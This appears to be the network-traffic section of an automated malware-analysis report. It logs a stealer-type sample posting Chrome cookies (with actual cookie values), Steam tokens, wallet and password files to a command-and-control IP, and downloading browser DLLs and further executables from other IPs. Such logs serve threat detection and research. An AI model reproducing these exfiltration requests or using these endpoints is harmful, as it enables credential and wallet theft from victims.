Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="message"plugins------KEGCBFCBFBKFHIECAFCF--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="message"fplugins------HJJJDAEGIDHCBFHJJJEG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEGHost: 85.28.47.31Content-Length: 7495Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 34 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="file"------FHCGCFHDHIIIDGCAAEGD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 2d 2d 0d 0a Data Ascii: ------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="file"------AFIIIIJKFCAAECAKFIEH--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEBKECBAKFBGDGCBGDHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKFBFIDGDBFHJJEHIHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="message"wallets------CAKKKFBFIDGDBFHJJEHI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFBHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 2d 2d 0d 0a Data Ascii: ------FHJDBKJKFIECAAAKFBFBContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------FHJDBKJKFIECAAAKFBFBContent-Disposition: form-data; name="message"ybncbhylepme------FHJDBKJKFIECAAAKFBFB--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="file"------IIDHJKFBGIIJJKFIJDBG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="message"files------DHIDHIEGIIIECAKEBFBA--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 34 64 31 61 34 61 66 61 61 35 36 63 64 38 61 66 33 61 36 38 38 32 35 31 64 31 38 39 36 32 32 39 31 63 33 61 34 66 63 37 66 33 33 61 61 34 31 35 35 33 61 31 35 33 39 33 38 62 31 38 33 34 31 32 31 34 35 38 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="token"8f4d1a4afaa56cd8af3a688251d18962291c3a4fc7f33aa41553a153938b18341214583c------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEBGCBAFCGDAAKFIDGIE--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
